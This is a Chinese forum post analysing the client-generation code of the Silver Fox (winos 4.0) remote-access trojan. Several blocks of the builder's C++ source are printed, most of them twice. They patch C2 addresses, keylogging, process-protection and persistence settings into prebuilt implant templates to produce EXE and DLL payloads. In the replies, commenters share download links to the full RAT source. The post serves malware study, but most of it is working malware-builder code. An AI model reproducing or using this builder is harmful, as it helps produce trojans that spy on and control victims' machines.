首页
社区
课程
招聘
[原创]银狐 winos 4.0 源码分析:客户端生成流程
发表于: 2024-11-22 10:52 4850

[原创]银狐 winos 4.0 源码分析:客户端生成流程

2024-11-22 10:52
4850

最近在学习木马分析,网上关于银狐的源码分析目前还没看到,挖个坑学一学银狐(winos 4.0)的源码。

客户生成/BuildDlg.cpp 是生成客户端的窗口类(CBuildDlg)的实现代码,是由下面几个函数实现客户端的生成:

生成过程由CBuildDlg::build函数进行控制,被上面几个函数进行调用,此处为核心代码:

整体流程为:

其中获取配置信息的getsettingdata()函数尤为重要,配置信息由客户端界面进行设置,部分为默认值:

生成客户端(exe)的日志如下:

其中 上线模块.bin -> output_64.exe 流程由 CBuildDlg::changedataandwritefile()函数控制,具体流程为:

上述流程详细来说:

也就是说,.bin 文件实际上就是预先编译好的exe文件,最后进行:

生成客户端(dll)的日志为:

生成dll的核心函数为CBuildDlg::OnBnClickedBuilddll(),具体流程为:

首先会询问是否加载DLL入口点的原因是这个dll可以使用两种执行方式:

DLL生成时需要额外处理导出函数,这里额外使用了一个标记 "zidingyixiugaidaochuhanshu":

生成过程中会将这个函数名替换到DLL模板中预设的"zidingyixiugaidaochuhanshu"标记位置。在代码中导出函数名是通过界面上的 m_edit_dll 变量控制的,其默认值为"run":

银狐的设计比较灵活,对比两种dll执行方式,各有优缺点:

DllMain执行:

导出函数执行:

生成Shellcode的主要流程在OnBnClickedBuildShellcodechangeshellcodeandwritefile这两个函数中。主要流程如下:

首先提示用户Shellcode的限制:

准备Shellcode的配置信息:

读取Shellcode模板文件:

组合Shellcode数据:

写出Shellcode文件:

其中Shellcode的数据结构为:

数据排列方式:

可以看到这里使用的是执行代码.dll而不是上线模块.dll,是因为执行代码.dll和上线模块.dll的用途和结构是不同的:

上线模块.dll:

执行代码.dll:

执行代码.dll的源码ShellCode_main.cpp的实现核心为:

从执行代码.dll(shellcode)下载的payload是上线模块.dll/.bin:

最后Shellcode完整执行方式为:

powershell 目前很少用到,并且有一定限制,本文主要针对几种主要使用的客户端生成流程进行分析,如有问题欢迎指正。

void OnBnClickedBuildexe() // 生成EXE文件
void OnBnClickedBuilddll() // 生成DLL文件
void OnBnClickedBuildShellcode() // 生成Shellcode
void OnBnClickedBuildPowershell() // 生成PowerShell脚本,PowerShell生成方式只使用第一组服务器配置。
void OnBnClickedBuildexe() // 生成EXE文件
void OnBnClickedBuilddll() // 生成DLL文件
void OnBnClickedBuildShellcode() // 生成Shellcode
void OnBnClickedBuildPowershell() // 生成PowerShell脚本,PowerShell生成方式只使用第一组服务器配置。
BOOL CBuildDlg::build(int mode)
{
    UpdateData(TRUE);
    CFileDialog dlg(FALSE, _T(""), _T("output"), OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, _T("可执行文件(*.*)| All Files (*.*) |*.*||"), NULL);
    if (dlg.DoModal() != IDOK)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("已取消生成\r\n"));
        return FALSE;
    }
    CString path;
    if (mode == 0)
    {
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.bin");
        swprintf_s(writepath, _T("%s_86.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86  exe 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.bin");
        swprintf_s(writepath, _T("%s_64.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64  exe 生成失败\r\n"));
            return FALSE;
        }
    }
    if (mode == 1)
    {
        if (MessageBox(_T("Dll加载运行DllMain吗?"), _T("加载执行"), MB_OKCANCEL) == IDOK)
        {
            MyInfo.otherset.RunDllEntryProc = true;
        }
        else
        {
            MyInfo.otherset.RunDllEntryProc = false;
        }
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.dll");
        swprintf_s(writepath, _T("%s_86.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86  dll 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.dll");
        swprintf_s(writepath, _T("%s_64.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64  exe 生成失败\r\n"));
            return FALSE;
        }
    }
    return TRUE;
 
}
BOOL CBuildDlg::build(int mode)
{
    UpdateData(TRUE);
    CFileDialog dlg(FALSE, _T(""), _T("output"), OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, _T("可执行文件(*.*)| All Files (*.*) |*.*||"), NULL);
    if (dlg.DoModal() != IDOK)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("已取消生成\r\n"));
        return FALSE;
    }
    CString path;
    if (mode == 0)
    {
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.bin");
        swprintf_s(writepath, _T("%s_86.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86  exe 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.bin");
        swprintf_s(writepath, _T("%s_64.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64  exe 生成失败\r\n"));
            return FALSE;
        }
    }
    if (mode == 1)
    {
        if (MessageBox(_T("Dll加载运行DllMain吗?"), _T("加载执行"), MB_OKCANCEL) == IDOK)
        {
            MyInfo.otherset.RunDllEntryProc = true;
        }
        else
        {
            MyInfo.otherset.RunDllEntryProc = false;
        }
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.dll");
        swprintf_s(writepath, _T("%s_86.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86  dll 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.dll");
        swprintf_s(writepath, _T("%s_64.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64  exe 生成失败\r\n"));
            return FALSE;
        }
    }
    return TRUE;
 
}
BOOL CBuildDlg::getsettingdata()
{
    UpdateData(TRUE);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数\r\n"));
 
    _tcscpy_s(MyInfo.szAddress, m_edit_ip.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort, m_edit_port.GetBuffer(0));
    MyInfo.IsTcp = h_combo_net.GetCurSel() ? false : true;
 
    _tcscpy_s(MyInfo.szAddress2, m_edit_ip2.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort2, m_edit_port2.GetBuffer(0));
    MyInfo.IsTcp2 = h_combo_net2.GetCurSel() ? false : true;
 
    _tcscpy_s(MyInfo.szAddress3, m_edit_ip3.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort3, m_edit_port3.GetBuffer(0));
    MyInfo.IsTcp3 = h_combo_net3.GetCurSel() ? false : true;
 
 
 
    _tcscpy_s(MyInfo.szRunSleep, m_edit_first_time.GetBuffer(0));
    _tcscpy_s(MyInfo.szHeart, m_edit_rest_time.GetBuffer(0));
    _tcscpy_s(MyInfo.Remark, m_edit_v.GetBuffer(0));
    _tcscpy_s(MyInfo.szGroup, m_edit_g.GetBuffer(0));
 
 
 
    MyInfo.otherset.IsKeyboard = (((CButton*)GetDlgItem(IDC_CHECK_KEYBOARD))->GetCheck()) ? true : false;
    MyInfo.otherset.antinet = (((CButton*)GetDlgItem(IDC_CHECK_NET))->GetCheck()) ? true : false;
    MyInfo.otherset.Processdaemon = (((CButton*)GetDlgItem(IDC_CHECK_PROCESSDAEMON))->GetCheck()) ? true : false;
    MyInfo.otherset.ProtectedProcess = (((CButton*)GetDlgItem(IDC_CHECK_PROTEXTEDPROCESS))->GetCheck()) ? true : false;
    MyInfo.otherset.puppet = (((CButton*)GetDlgItem(IDC_CHECK_PUPPET))->GetCheck()) ? true : false;
 
 
    CString s = confimodel;
    Setfindinfo(s, _T("地址1"), MyInfo.szAddress, NULL);
    Setfindinfo(s, _T("端口1"), MyInfo.szPort, NULL);
    Setfindinfo(s, _T("通信1"), NULL, MyInfo.IsTcp);
 
    Setfindinfo(s, _T("地址2"), MyInfo.szAddress2, NULL);
    Setfindinfo(s, _T("端口2"), MyInfo.szPort2, NULL);
    Setfindinfo(s, _T("通信2"), NULL, MyInfo.IsTcp2);
 
    Setfindinfo(s, _T("地址3"), MyInfo.szAddress3, NULL);
    Setfindinfo(s, _T("端口3"), MyInfo.szPort3, NULL);
    Setfindinfo(s, _T("通信3"), NULL, MyInfo.IsTcp3);
 
    Setfindinfo(s, _T("等待"), MyInfo.szRunSleep, NULL);
    Setfindinfo(s, _T("重连"), MyInfo.szHeart, NULL);
    Setfindinfo(s, _T("分组"), MyInfo.szGroup, NULL);
    Setfindinfo(s, _T("版本"), MyInfo.szVersion, NULL);
    Setfindinfo(s, _T("备注"), MyInfo.Remark, NULL);
 
    Setfindinfo(s, _T("键盘"), NULL, MyInfo.otherset.IsKeyboard);
    Setfindinfo(s, _T("保护"), NULL, MyInfo.otherset.ProtectedProcess);
    Setfindinfo(s, _T("流量"), NULL, MyInfo.otherset.antinet);
    Setfindinfo(s, _T("入口"), NULL, MyInfo.otherset.RunDllEntryProc);
    Setfindinfo(s, _T("守护"), NULL, MyInfo.otherset.Processdaemon);
    Setfindinfo(s, _T("傀儡"), NULL, MyInfo.otherset.puppet);
    Setfindinfo(s, _T("特别"), NULL, MyInfo.otherset.special);
    s.MakeReverse();
    ZeroMemory(confi, 1000 * 2);
    memcpy(confi, s.GetBuffer(), s.GetLength() * 2 + 2);
    return TRUE;
 
}
BOOL CBuildDlg::getsettingdata()
{
    UpdateData(TRUE);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数\r\n"));
 
    _tcscpy_s(MyInfo.szAddress, m_edit_ip.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort, m_edit_port.GetBuffer(0));
    MyInfo.IsTcp = h_combo_net.GetCurSel() ? false : true;
 
    _tcscpy_s(MyInfo.szAddress2, m_edit_ip2.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort2, m_edit_port2.GetBuffer(0));
    MyInfo.IsTcp2 = h_combo_net2.GetCurSel() ? false : true;
 
    _tcscpy_s(MyInfo.szAddress3, m_edit_ip3.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort3, m_edit_port3.GetBuffer(0));
    MyInfo.IsTcp3 = h_combo_net3.GetCurSel() ? false : true;
 
 
 
    _tcscpy_s(MyInfo.szRunSleep, m_edit_first_time.GetBuffer(0));
    _tcscpy_s(MyInfo.szHeart, m_edit_rest_time.GetBuffer(0));
    _tcscpy_s(MyInfo.Remark, m_edit_v.GetBuffer(0));
    _tcscpy_s(MyInfo.szGroup, m_edit_g.GetBuffer(0));
 
 
 
    MyInfo.otherset.IsKeyboard = (((CButton*)GetDlgItem(IDC_CHECK_KEYBOARD))->GetCheck()) ? true : false;
    MyInfo.otherset.antinet = (((CButton*)GetDlgItem(IDC_CHECK_NET))->GetCheck()) ? true : false;
    MyInfo.otherset.Processdaemon = (((CButton*)GetDlgItem(IDC_CHECK_PROCESSDAEMON))->GetCheck()) ? true : false;
    MyInfo.otherset.ProtectedProcess = (((CButton*)GetDlgItem(IDC_CHECK_PROTEXTEDPROCESS))->GetCheck()) ? true : false;
    MyInfo.otherset.puppet = (((CButton*)GetDlgItem(IDC_CHECK_PUPPET))->GetCheck()) ? true : false;
 
 
    CString s = confimodel;
    Setfindinfo(s, _T("地址1"), MyInfo.szAddress, NULL);
    Setfindinfo(s, _T("端口1"), MyInfo.szPort, NULL);
    Setfindinfo(s, _T("通信1"), NULL, MyInfo.IsTcp);
 
    Setfindinfo(s, _T("地址2"), MyInfo.szAddress2, NULL);
    Setfindinfo(s, _T("端口2"), MyInfo.szPort2, NULL);
    Setfindinfo(s, _T("通信2"), NULL, MyInfo.IsTcp2);
 
    Setfindinfo(s, _T("地址3"), MyInfo.szAddress3, NULL);
    Setfindinfo(s, _T("端口3"), MyInfo.szPort3, NULL);
    Setfindinfo(s, _T("通信3"), NULL, MyInfo.IsTcp3);
 
    Setfindinfo(s, _T("等待"), MyInfo.szRunSleep, NULL);
    Setfindinfo(s, _T("重连"), MyInfo.szHeart, NULL);
    Setfindinfo(s, _T("分组"), MyInfo.szGroup, NULL);
    Setfindinfo(s, _T("版本"), MyInfo.szVersion, NULL);
    Setfindinfo(s, _T("备注"), MyInfo.Remark, NULL);
 
    Setfindinfo(s, _T("键盘"), NULL, MyInfo.otherset.IsKeyboard);
    Setfindinfo(s, _T("保护"), NULL, MyInfo.otherset.ProtectedProcess);
    Setfindinfo(s, _T("流量"), NULL, MyInfo.otherset.antinet);
    Setfindinfo(s, _T("入口"), NULL, MyInfo.otherset.RunDllEntryProc);
    Setfindinfo(s, _T("守护"), NULL, MyInfo.otherset.Processdaemon);
    Setfindinfo(s, _T("傀儡"), NULL, MyInfo.otherset.puppet);
    Setfindinfo(s, _T("特别"), NULL, MyInfo.otherset.special);
    s.MakeReverse();
    ZeroMemory(confi, 1000 * 2);
    memcpy(confi, s.GetBuffer(), s.GetLength() * 2 + 2);
    return TRUE;
 
}
开始生成.
初始化参数
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x86\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_86.exe
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x64\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_64.exe
生成成功
开始生成.
初始化参数
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x86\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_86.exe
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x64\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_64.exe
生成成功
BOOL CBuildDlg::changedataandwritefile(CString path, BOOL bchangeexport)
{
    TCHAR DatPath[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, DatPath, sizeof(DatPath));
    *_tcsrchr(DatPath, _T('\\')) = '\0';
    CString path_data;
    path_data = DatPath;
    path_data += path;
 
    WIN32_FIND_DATA FindData;
    HANDLE hFile;
    hFile = FindFirstFile(path_data, &FindData);
    if (hFile == INVALID_HANDLE_VALUE) { m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("文件不存在")); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));  return FALSE; }
    FindClose(hFile);
 
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件"));   m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
    hFile = CreateFile(path_data, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件失败"));     m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        return FALSE;
    }
    DWORD len = GetFileSize(hFile, NULL);
    char* str = new char[len];
    ZeroMemory(str, sizeof(str));
    DWORD wr = 0;
    ReadFile(hFile, str, len, &wr, NULL);
    CloseHandle(hFile);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("修改配置信息\r\n"));
    DWORD dwOffset = -1;
    dwOffset = memfind(str, _T("xiugaishiyong"), len, 0);
 
    if (dwOffset == -1)                                          //无法修改配置信息就退出
    {
 
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到上线配置标记 \r\n"));
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
        SAFE_DELETE_AR(str);
        return FALSE;
    }
 
    DWORD dwOffset_export = -1;
    char* exportnamebuf = NULL;
    int exportnamelen = 0;
 
    if (bchangeexport)
    {
 
        dwOffset_export = memfind(str, "zidingyixiugaidaochuhanshu", len, 0);
         exportnamelen = WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, NULL, 0, NULL, NULL);
        exportnamebuf = new char[exportnamelen + 1];
        WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, exportnamebuf, exportnamelen, NULL, NULL);
        if ((dwOffset_export == -1))  //无法修改到处函数名就退出
        {
            log_信息("找不到导出函数");
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到导出函数zidingyixiugaidaochuhanshu标记\r\n"));
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
            SAFE_DELETE_AR(exportnamebuf);
            SAFE_DELETE_AR(str);
            return FALSE;
        }
    }
 
 
 
    //写出配置好的文件
    CFile file;
    if (file.Open(writepath, CFile::modeCreate | CFile::modeWrite | CFile::modeRead | CFile::typeBinary))
    {
        if (dwOffset != -1)
            memcpy(str + dwOffset, (char*)&confi, lstrlen(confi) * 2 + 1);
 
        if (bchangeexport)
            memcpy(str + dwOffset_export, (char*)exportnamebuf, exportnamelen);
        file.Write(str, len);
        file.Close();
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("写出成功"));   m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)writepath);  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        SAFE_DELETE_AR(str);
        return TRUE;
    }
    else
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("文件无法创建,查看是否占用\r\n"));
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)writepath);
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
        SAFE_DELETE_AR(str);
        return FALSE;
    }
 
}
BOOL CBuildDlg::changedataandwritefile(CString path, BOOL bchangeexport)
{
    TCHAR DatPath[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, DatPath, sizeof(DatPath));
    *_tcsrchr(DatPath, _T('\\')) = '\0';
    CString path_data;
    path_data = DatPath;
    path_data += path;
 
    WIN32_FIND_DATA FindData;
    HANDLE hFile;
    hFile = FindFirstFile(path_data, &FindData);
    if (hFile == INVALID_HANDLE_VALUE) { m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("文件不存在")); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));  return FALSE; }
    FindClose(hFile);
 
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件"));   m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
    hFile = CreateFile(path_data, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件失败"));     m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        return FALSE;
    }
    DWORD len = GetFileSize(hFile, NULL);
    char* str = new char[len];
    ZeroMemory(str, sizeof(str));
    DWORD wr = 0;
    ReadFile(hFile, str, len, &wr, NULL);
    CloseHandle(hFile);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("修改配置信息\r\n"));
    DWORD dwOffset = -1;
    dwOffset = memfind(str, _T("xiugaishiyong"), len, 0);
 
    if (dwOffset == -1)                                          //无法修改配置信息就退出
    {
 
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到上线配置标记 \r\n"));
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
        SAFE_DELETE_AR(str);
        return FALSE;
    }
 
    DWORD dwOffset_export = -1;
    char* exportnamebuf = NULL;
    int exportnamelen = 0;
 
    if (bchangeexport)
    {
 
        dwOffset_export = memfind(str, "zidingyixiugaidaochuhanshu", len, 0);
         exportnamelen = WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, NULL, 0, NULL, NULL);
        exportnamebuf = new char[exportnamelen + 1];
        WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, exportnamebuf, exportnamelen, NULL, NULL);
        if ((dwOffset_export == -1))  //无法修改到处函数名就退出
        {
            log_信息("找不到导出函数");
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到导出函数zidingyixiugaidaochuhanshu标记\r\n"));
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
            SAFE_DELETE_AR(exportnamebuf);
            SAFE_DELETE_AR(str);
            return FALSE;
        }
    }
 
 
 
    //写出配置好的文件
    CFile file;
    if (file.Open(writepath, CFile::modeCreate | CFile::modeWrite | CFile::modeRead | CFile::typeBinary))
    {
        if (dwOffset != -1)
            memcpy(str + dwOffset, (char*)&confi, lstrlen(confi) * 2 + 1);
 
        if (bchangeexport)
            memcpy(str + dwOffset_export, (char*)exportnamebuf, exportnamelen);
        file.Write(str, len);
        file.Close();
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("写出成功"));   m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)writepath);  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        SAFE_DELETE_AR(str);
        return TRUE;

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2024-11-22 10:54 被bwner编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (14)
雪    币: 4221
活跃值: (937)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
大佬方便分享一份源码吗
2024-11-22 13:44
0
雪    币: 2395
活跃值: (5434)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
3
Hades一KXXY 大佬方便分享一份源码吗
我看的这套 https://github.com/Logkiss/Rat-winos4.0-gh0st
2024-11-22 14:03
0
雪    币: 4221
活跃值: (937)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
bwner 我看的这套 https://github.com/Logkiss/Rat-winos4.0-gh0st
winos4.0 里面的源码全是空的这个项目
2024-11-22 14:07
0
雪    币: 2395
活跃值: (5434)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
5
Hades一KXXY winos4.0 里面的源码全是空的这个项目
有的,插件就是源码
2024-11-22 14:27
0
雪    币: 4221
活跃值: (937)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
bwner 有的,插件就是源码

我打开方式错误了么,就是模块里

2024-11-22 14:36
0
雪    币: 2395
活跃值: (5434)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
7
Hades一KXXY 我打开方式错误了么,就是模块里
看起来确实删掉了,用git版本回退吧,看到他明确写了delete了哈哈哈
2024-11-22 14:37
0
雪    币: 4221
活跃值: (937)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
bwner 看起来确实删掉了,用git版本回退吧,看到他明确写了delete了哈哈哈
我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前存的吗
2024-11-22 14:40
0
雪    币: 4221
活跃值: (937)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前存的吗
大佬方便发一份吗,在线等着学习
2024-11-22 15:13
0
雪    币: 2395
活跃值: (5434)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
10
Hades一KXXY 大佬方便发一份吗,在线等着学习
不方便
2024-11-22 15:18
0
雪    币: 4221
活跃值: (937)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
bwner 不方便
那可以单发一下BuildDlg.cpp么
2024-11-22 15:19
0
雪    币: 2356
活跃值: (8770)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
12
Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前存的吗

银狐这里倒是有套源码,当心有后门
https://pan.baidu.com/s/1cq28IpRK_SJRoFW3p8iAZw

提取码:d77k


只需要 BuildDlg.cpp 的话
https://x.ws28.cn/f/fmqi2yr2a3u

最后于 2024-11-22 16:25 被2DCoXrq编辑 ,原因:
2024-11-22 16:19
2
雪    币: 4221
活跃值: (937)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
2DCoXrq Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前 ...
谢谢大佬,你可太好了,我用虚拟机研究,加规则的,感谢
2024-11-22 16:34
0
雪    币: 183
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
2DCoXrq Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前 ...
你好。只需要 BuildDlg.cpp 的话
https://x.ws28.cn/f/fmqi2yr2a3u
4天前
0
雪    币: 183
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
2DCoXrq Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前 ...
这个链接失效了,可以再发一次吗?
4天前
0
游客
登录 | 注册 方可回帖
返回
//